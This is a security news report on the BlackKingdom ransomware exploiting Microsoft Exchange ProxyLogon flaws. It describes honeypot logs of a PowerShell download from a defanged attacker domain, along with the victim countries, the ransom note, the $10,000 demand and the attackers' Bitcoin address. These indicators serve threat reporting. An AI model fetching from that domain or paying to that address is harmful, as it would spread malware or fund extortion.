Another ransomware operation known as ‘BlackKingdom’ is exploiting the Microsoft Exchange Server ProxyLogon vulnerabilities to encrypt servers.

Based on the logs from his honeypots, Hutchins states that the threat actor used the vulnerability to execute a PowerShell script that downloads the ransomware executable from ‘yuuuuu44[.]com‘ and then pushes it out to other computers on the network.

Honeypots are devices with known vulnerabilities exposed on the Internet to lure attackers and monitor their activities. Hutchins’ honeypots, though, did not appear to become encrypted, and the attack he witnessed was believed to be a failed campaign.

Victims are located in the USA, Canada, Austria, Switzerland, Russia, France, Israel, United Kingdom, Italy, Germany, Greece, Australia, and Croatia.

When encrypting devices, the ransomware will encrypt files using random extensions and then create a ransom note named  decrypt_file.TxT

BlackKingdom ransom note

BlackKingdom ransom note

The ransom notes all demand $10,000 in bitcoin and use the same Bitcoin address (1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT) for payment. This Bitcoin address has received only one payment on March 18th, which has since been transferred to another address.

The current ransomware executable is a Python script compiled into a Windows executable. The BlackKingdom ransomware from June 2020 was also coded in Python.null

BlackKingdom is the second confirmed ransomware targeting the Microsoft Exchange ProxyLogon vulnerabilities. The first was the DearCry ransomware that was used in limited attacks earlier in the month.